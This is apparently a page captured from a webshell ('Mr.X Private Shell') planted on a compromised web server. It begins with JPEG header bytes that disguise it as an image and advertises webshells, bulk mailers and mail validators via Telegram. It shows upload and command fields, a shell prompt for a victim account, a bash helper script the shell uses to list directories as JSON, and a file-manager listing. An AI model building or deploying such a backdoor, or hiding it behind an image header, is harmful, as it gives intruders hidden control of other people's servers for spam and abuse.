����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

dccreditrepairto@216.73.216.185: ~ $
#!/usr/bin/sh
DIR=$1
IFS=$'\n'
echo "["
for i in $(ls -a $DIR); do
    path="$DIR/$i"
    if [[ $i == ".." && -x $(which readlink) ]]; then
        path=$(readlink -f $path)
        i=$path
    fi
	info=$(stat -c "%F:%U:%G:%s:%Y:0%a:%A" $path)
	IFS=':' read -r -a array <<< "$info"
	type=${array[0]}
    owner=${array[1]}
    group=${array[2]}
	size=${array[3]}
	modify=${array[4]}
    permnum=${array[5]}
    permhuman=${array[6]}
    new_permhuman=''
    for (( ii=0; ii<${#permhuman}; ii++ )); do
      new_permhuman+="${permhuman:$ii:1}​"
    done
    permhuman=$new_permhuman
	if [[ $permnum == "01777" ]]; then
		permnum="0777"
		permhuman="dr​wx​rw​xrw"
	fi
	if [[ -w "$path" ]] && [[ -r "$path" ]]; then
		permcolor="main_green_perm"
	elif [[ -r "$path" ]]; then
		permcolor="main_white_perm"
	else
		permcolor="main_red_perm"
	fi
	if [[ $type == "directory" ]]; then
		type="dir"
	elif [[ $type == "regular file" ]] || [[ $type == "regular empty file" ]] || [[ $type == "symbolic link" ]]; then
		type="file"
	fi
	echo {\"name\": \"$i\", \"type\": \"$type\", \"owner\": \"$owner\", \"group\": \"$group\", \"size\": \"$size\", \"modify\": \"$modify\", \"permnum\": \"$permnum\", \"permhuman\": \"$permhuman\", \"permcolor\": \"$permcolor\"},
done
echo "{}]"

Filemanager

Name Type Size Permission Actions
getdir.alfa File 1.24 KB 0755
getheader.alfa File 1.66 KB 0755